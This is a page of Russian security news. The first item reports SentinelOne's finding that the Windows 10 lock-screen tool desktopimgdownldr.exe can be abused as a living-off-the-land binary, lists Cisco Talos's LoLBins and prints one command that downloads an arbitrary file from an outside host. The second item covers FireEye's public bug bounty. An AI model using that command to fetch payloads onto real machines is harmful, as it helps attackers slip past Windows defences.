Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

FireEye открыла программу по поиску уязвимостей сторонним экспертам

FireEye открыла свою программу по поиску уязвимостей всем исследователям в области кибербезопасности. Сообщить о багах представителям компании можно на площадке Bugcrowd.

Какое-то время программа FireEye работала в закрытом режиме, специалисты Bugcrowd пытались найти бреши в многочисленных сайтах компании.

За качественные отчёты о критических уязвимостях эксперты могли заработать от $1500 до $2500, за дыры высокой степени опасности — от $800 до $1250, за средние — от $200 до $500, наименее опасные — от $50 до $150.

Исследователи, однако, должны убедиться, что атакуют исключительно те ресурсы, которые участвуют в программе. Также стоит отправлять отчёты через соответствующие формы. Только так можно будет рассчитывать на денежное вознаграждение.

FireEye также подчёркивает, что социальная инженерия, DoS и физические атаки не попадают в программу по поиску проблем безопасности. Требующие административного или физического доступа бреши тоже не принесут экспертам денег.

В ближайшие месяцы FireEye обещает распространить программу по поиску уязвимостей на большее количество продуктов и сервисов. Подробную информацию можно найти на сайте Bugcrowd.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru